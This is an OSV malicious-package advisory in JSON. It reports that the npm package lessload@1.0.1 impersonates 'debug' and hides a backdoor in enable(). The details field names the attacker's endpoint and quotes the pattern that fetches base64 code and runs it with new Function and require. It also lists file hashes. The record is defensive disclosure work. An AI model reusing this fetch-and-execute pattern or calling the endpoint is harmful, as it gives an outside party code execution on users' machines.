{"id":"MAL-2026-6579","summary":"Malicious code in lessload (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9a5401aaa39f6562549f4fa8298e5bcee579987b837d2440565c37a8f5182dc6)\nlessload@1.0.1 impersonates the popular `debug` package (replicating its API surface, contributor list, and description as a 'Lightweight debugging utility') and embeds a backdoor inside the exported `enable()` function in src/common.js. When a consumer calls `debug.enable(namespaces)`, the package issues an outbound HTTPS request to the hardcoded endpoint `https://fundraiser-success.vercel.app/api/debugCheck?id=\u003cnamespaces\u003e`, base64-decodes the `message` field of the response, and executes it via `new Function('require', decoded)(require)` — granting the operator of that endpoint arbitrary code execution with full `require` access inside the consumer's Node.js process. The same request leaks the caller-supplied namespace argument to the attacker-controlled host. The malicious block is wrapped in cover-story comments labelling it 'DEBUG-ONLY: Remote code execution for debugging purposes' to disguise the backdoor as a legitimate debug feature. Because the package is positioned as a drop-in `debug` lookalike, any installer expecting `debug` semantics will trigger the RCE on the first `enable()` call.\n","modified":"2026-06-29T07:16:41.639387442Z","published":"2026-06-29T05:32:36Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-29T07:09:09.513724392Z","sha256":"9a5401aaa39f6562549f4fa8298e5bcee579987b837d2440565c37a8f5182dc6","versions":["1.0.1"],"modified_time":"2026-06-29T05:32:36Z","id":"IN-MAL-2026-007744","ranges":[{"events":[{"introduced":"0"}],"type":"SEMVER"}],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/lessload/v/1.0.1"}],"affected":[{"package":{"name":"lessload","ecosystem":"npm","purl":"pkg:npm/lessload"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["1.0.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"35425048a4f334528777a07ec71f7442e23a81272a44ca5678ce435c6f96a3442effe6","sha256":"16527ff1117b8744a52b939fd4b384361f9110305642d5892964aef53cf66a59","path":"src/common.js"},{"tlsh":"af41bba2cc6c4d730fca649569ad1402b6229d83cd84fd1e7366425ecf4c16f21fdaad","sha256":"d814137fc577b63aa2cb6c7663b202a93e9b63a9407e437e7ccdef946f382c98","path":"package.json"}],"package_integrity":[{"filename":"lessload-1.0.1.tgz","hashes":{"sha512_sri":"sha512-igjuWhvNAFTQomAB9BwqMGhatbX6ihwppOXR+WAugBxg9koEVfUJJcaL6FT1EnfUQ3pxDC8OvCOygdgkTNx3cA==","sha1":"346c37f113e647fc2ff0d7b4d2c52819649b3656"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/lessload/MAL-2026-6579.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}